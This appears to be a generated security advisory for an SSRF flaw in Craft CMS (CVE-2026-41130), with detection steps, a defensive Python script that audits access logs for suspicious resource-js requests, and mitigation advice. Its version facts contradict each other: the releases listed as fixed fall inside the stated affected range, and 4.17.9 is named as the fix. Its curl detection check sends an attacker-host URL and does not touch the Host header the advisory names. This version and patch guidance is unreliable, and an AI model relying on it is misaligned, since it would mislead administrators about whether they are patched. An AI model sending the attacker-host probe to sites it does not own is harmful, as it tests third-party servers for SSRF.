Platform: php
Component: craftcms
Fixed in: 5.0.1, 4.0.1, 5.9.15
CVE-2026-41130 describes a Server-Side Request Forgery (SSRF) vulnerability discovered in Craft CMS. This flaw allows unauthenticated attackers to proxy remote JavaScript resources by manipulating the Host header. The vulnerability impacts versions 4.0.0-RC1 through 5.9.14, and a fix is available in version 4.17.9.
The SSRF vulnerability in Craft CMS arises from the application's trust of the client-supplied Host header when determining the baseUrl used in prefix validation within the actionResourceJs() function. Without explicit restrictions on trustedHosts, an attacker can craft a malicious Host header, effectively controlling the HTTP requests made by the server. This enables the attacker to initiate arbitrary HTTP requests to internal or external resources, potentially exposing sensitive data or interacting with internal services that should not be directly accessible from the internet. The impact is amplified if the server has access to sensitive internal resources or APIs.
CVE-2026-41130 was publicly disclosed on 2026-04-21. There is no indication of active exploitation campaigns at this time. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept code is not yet widely available, but the vulnerability's nature makes it likely that such code will emerge.
Craft CMS installations running versions 4.0.0-RC1 through 5.9.14 are at risk. This includes deployments using the default configuration where trustedHosts is not explicitly restricted. Shared hosting environments running Craft CMS are particularly vulnerable due to the potential for cross-tenant exploitation.
• php / server:
grep -r 'actionResourceJs()' /path/to/craft-cms/app/controllers/AppController.php
• generic web:
curl -I 'https://your-craft-cms-site.com/resource-js?resource=https://attacker.com'
Examine the response headers for unexpected Content-Security-Policy directives or other anomalies.
• generic web:
Review Craft CMS access and error logs for requests to unusual or unexpected domains via the resource-js endpoint.
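The log review above can be scripted. The following is an added example (not code from Craft CMS or from this advisory) that audits a constructed access log in Apache vhost_combined style, where the first field is the Host header the server received. It flags resource-js requests whose Host header or `resource` URL points outside an allowlist, i.e. the two values a restricted trustedHosts setting is meant to pin down. The log format, hostnames and `/resource-js?resource=` path are assumptions taken from the check above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log, Apache "vhost_combined"-style: %v:%p %h %l %u %t "%r" %>s %O
# The %v field is the Host header the server saw for that request.
SAMPLE_LOG = """\
www.example.com:443 198.51.100.7 - - [21/Apr/2026:09:12:01 +0000] "GET /resource-js?resource=https://www.example.com/cpresources/app.js HTTP/1.1" 200 4821
www.example.com:443 203.0.113.9 - - [21/Apr/2026:09:12:05 +0000] "GET /resource-js?resource=https://attacker.example/evil.js HTTP/1.1" 200 120
evil.example:443 203.0.113.9 - - [21/Apr/2026:09:12:07 +0000] "GET /resource-js?resource=https://evil.example/x.js HTTP/1.1" 200 120
www.example.com:443 198.51.100.7 - - [21/Apr/2026:09:12:09 +0000] "GET /index.php HTTP/1.1" 200 9001
"""

LINE_RE = re.compile(
    r'^(?P<vhost>[^:\s]+):\d+\s+(?P<client>\S+)\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>\S+)\s+(?P<target>\S+)\s+[^"]*"\s+(?P<status>\d{3})'
)


def audit_resource_js(log_text, trusted_hosts):
    """Return one finding per resource-js request whose Host header or
    'resource' parameter names a host outside trusted_hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        target = urlsplit(m["target"])
        if not target.path.endswith("/resource-js"):
            continue  # only the proxying endpoint is of interest here
        reasons = []
        vhost = m["vhost"].lower()
        if vhost not in trusted:
            reasons.append(f"untrusted Host header {vhost!r}")
        for res in parse_qs(target.query).get("resource", []):
            res_host = (urlsplit(res).hostname or "").lower()
            if res_host not in trusted:
                reasons.append(f"resource host {res_host!r} not trusted")
        if reasons:
            findings.append({"line": lineno, "client": m["client"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_resource_js(SAMPLE_LOG, ["www.example.com"]):
        print(f"line {f['line']} from {f['client']}: " + "; ".join(f["reasons"]))
```

Feed it the real access log (with the same vhost-first format) and the hosts you would place in trustedHosts; any hit is a request that the fixed versions would reject.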
Exploit status: disclosure
EPSS: 0.05% (14th percentile)
The primary mitigation for CVE-2026-41130 is to upgrade Craft CMS to version 4.17.9 or later. Prior to upgrading, carefully review the release notes for any breaking changes that might impact your application's functionality. As a temporary workaround, restrict the trustedHosts configuration setting to only allow trusted domains. This limits the server's ability to proxy requests to unauthorized locations. Monitor server logs for unusual outbound HTTP requests originating from the resource-js endpoint. Consider implementing a Web Application Firewall (WAF) with rules to block requests with suspicious Host headers.
Update Craft CMS to version 4.17.9 or later, or to version 5.9.15 or later. This update corrects the Host header injection vulnerability that enables server-side request forgery (SSRF) attacks by limiting trust in the client-supplied Host header.
CVE-2026-41130 is a Server-Side Request Forgery (SSRF) vulnerability in Craft CMS that allows attackers to proxy remote JavaScript resources by manipulating the Host header.
You are affected if you are running Craft CMS versions 4.0.0-RC1 through 5.9.14 and have not explicitly restricted the trustedHosts configuration.
Upgrade Craft CMS to version 4.17.9 or later. As a temporary workaround, restrict the trustedHosts configuration setting to only allow trusted domains.
There is currently no indication of active exploitation campaigns, but the vulnerability's nature makes it likely that exploitation will occur.
Refer to the official Craft CMS security advisory for detailed information and updates: [https://craftcms.com/security/advisories](https://craftcms.com/security/advisories)